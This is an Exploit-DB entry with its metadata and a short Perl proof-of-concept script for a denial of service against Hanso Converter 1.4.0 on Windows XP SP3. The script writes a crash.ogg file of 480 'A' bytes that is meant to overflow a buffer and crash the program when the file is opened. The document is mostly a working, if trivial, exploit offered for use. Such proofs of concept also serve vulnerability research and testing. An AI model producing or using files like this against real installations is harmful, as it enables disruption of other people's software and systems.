Hanso Converter 1.4.0 - '.ogg' Denial of Service

Author: anT!-Tr0J4n
type: dos
platform: windows
port: 
date_added: 2010-10-19  
date_updated: 2010-10-19  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-10-19-at-51739-am.png  
application_url: http://www.exploit-db.comhanso-converter-setup.exe  

raw file: 15283.txt  
===================================================
Hanso Converter (.ogg) Buffer Overflow Vulnerability
===================================================
#Title: Hanso Converter (.ogg) Buffer Overflow Vulnerability
#Author    :   anT!-Tr0J4n
#Email      :   D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com  ~all DEV-PoinT t34m
#thanks    :   r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home     :   www.Dev-PoinT.com  $ http://inj3ct0r.com
#Software :  http://www.hansotools.com/applications/hanso-converter.html
#Tested on:   Windows XP sp3
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/usr/bin/perl
print "| Author: anT!-Tr0J4n      |\n";
print "| Greetz :http://inj3ct0r.com     |\n";
print "|Home : www.Dev-PoinT.com  |\n";

my $junk= "\x41" x 480 ;
open(file,">crash.ogg");
print file $junk ;
close(file);